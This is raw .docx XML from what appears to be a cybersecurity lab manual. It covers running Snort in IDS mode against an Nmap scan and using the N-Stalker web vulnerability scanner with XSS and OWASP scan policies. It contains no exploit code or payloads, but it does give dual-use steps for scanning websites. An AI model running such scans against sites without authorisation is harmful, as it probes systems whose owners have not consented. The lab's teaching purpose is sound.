        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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(Note: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is used for my interface card)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BF6FD0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="49"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73316CC7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pP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it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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WordPard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>or NotePad++ to read the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2715EA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="229" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pP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ASCII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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snort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>in IDS mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58808327" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>snort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-i3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>c:\Snort\etc\snort.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>c:\Snort\log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ascii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55346481" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="101"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560093EF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="1187" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Scan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running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>snort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another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NMap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(ZenMap).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F382751" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="61"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5849330E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>After</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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scan 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snort-alerts.ids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insure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logging properly.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>You will see IP address folders appear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3877D5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="39"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1059CE65" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Snort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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0"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604FAC04" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/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6FF8D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="47"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3506A5DB" w14:textId="77777777" w:rsidR="00A16F47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61682862" wp14:editId="73E2243F">
            <wp:extent cx="5888641" cy="6090285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641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901C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65465BEF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5741D0E4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>RESULT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F79857" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="231"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9C0F75" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Thus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Intrusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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System(IDS)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demonstrated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Snort Intrusion Detection Tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6109CAC7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto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B514E0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="78" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="357"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Automated Attack and Penetration Tools Exploring N-Stalker, a Vulnerability Assessment </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EEB462" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="27"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108AF9BB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>AIM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9B4497" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="34"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13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N-Stalker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A31D89" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB0F1F4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
        </w:rPr>
        <w:t>EXPLORING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N-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>STALKER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483EE7AB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720"/>
        </w:tabs>
        <w:spacing w:before="274" w:line="337" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-Stalker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Scanner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assessment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tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304A76A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720"/>
        </w:tabs>
        <w:spacing w:before="3" w:line="232" w:lineRule="auto"/>
        <w:ind w:right="907"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="28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well-known</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>N-Stealth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Scanner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35,000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attack signature database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B66485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720"/>
        </w:tabs>
        <w:spacing w:line="342" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="28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comes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paid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773B0E37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720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>scanning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target,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“License</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Manager”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tab,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update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9D5442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720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="28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update,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date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B6409E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pP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N-Stalker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hyperlink r:id="rId17">
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>www.nstalker.com</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="-2"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07D9C2AC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="480DE8B9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079"/>
        </w:tabs>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="28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N-Stalker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computer.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under Start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>➪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A5C970" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Programs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
        </w:rPr>
        <w:t>➪</w:t>
      </w:r>
      <w:r>
        <w:t>N-Stalker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
        </w:rPr>
        <w:t>➪</w:t>
      </w:r>
      <w:r>
        <w:t>N-Stalker Free</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Edition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2DAB6C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079"/>
        </w:tabs>
        <w:spacing w:line="320" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pP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scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521630FD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079"/>
        </w:tabs>
        <w:spacing w:line="321" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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Scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38624356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079"/>
        </w:tabs>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>After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scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>completes,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N-Stalker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prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBE0386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079"/>
        </w:tabs>
        <w:spacing w:before="2" w:line="319" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="28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resulting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9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HTML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1099F7E3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="319" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pP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vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC76886" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="319" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:sectPr w:rsidR="00A16F47">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="174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1CB32" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="47"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DDD3A5E" w14:textId="77777777" w:rsidR="00A16F47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45956D43" wp14:editId="108D7E3B">
            <wp:extent cx="5944371" cy="4829175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71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15FE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="267"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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“Scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Session”,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rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F99633" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C041611" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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policy,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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>options,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CF6776" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="3" w:line="337" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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crawl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attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C0F92D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="336" w:lineRule="exact"/>
        <w:rPr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xss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assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44240EFC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="342" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>owasp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policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365FB902" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs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114944F1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E68267" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pPr>
      <w:r>
        <w:t>Once,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selected,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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“Optimize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>settings”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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crawl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 website for further analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202593BE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText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A1B032" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="222" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="2222"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>In</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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information, technologies used, policy name, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F155A4" w14:textId="77777777" w:rsidR="00A16F47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272" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F305D93" wp14:editId="1D829676">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>977900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>204804</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5409713" cy="3813810"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom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713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F487F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr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3D1AC2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="47"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D387086" w14:textId="77777777" w:rsidR="00A16F47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35D30057" wp14:editId="7AC0CA6A">
            <wp:extent cx="5528100" cy="3897629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100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9BAC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44FDEAE7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="30"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C297C74" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Once</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>done,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scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E98547E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74EE4441" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scanner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crawl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scripts,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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pages,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fields, information leakage, web forms related information which helps to analyze further.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BD73B0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:sectPr w:rsidR="00A16F47">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="18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0C0D5D" w14:textId="77777777" w:rsidR="00A16F47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224948" wp14:editId="2B6223E7">
            <wp:extent cx="5528662" cy="3109245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662" cy="31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E50" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
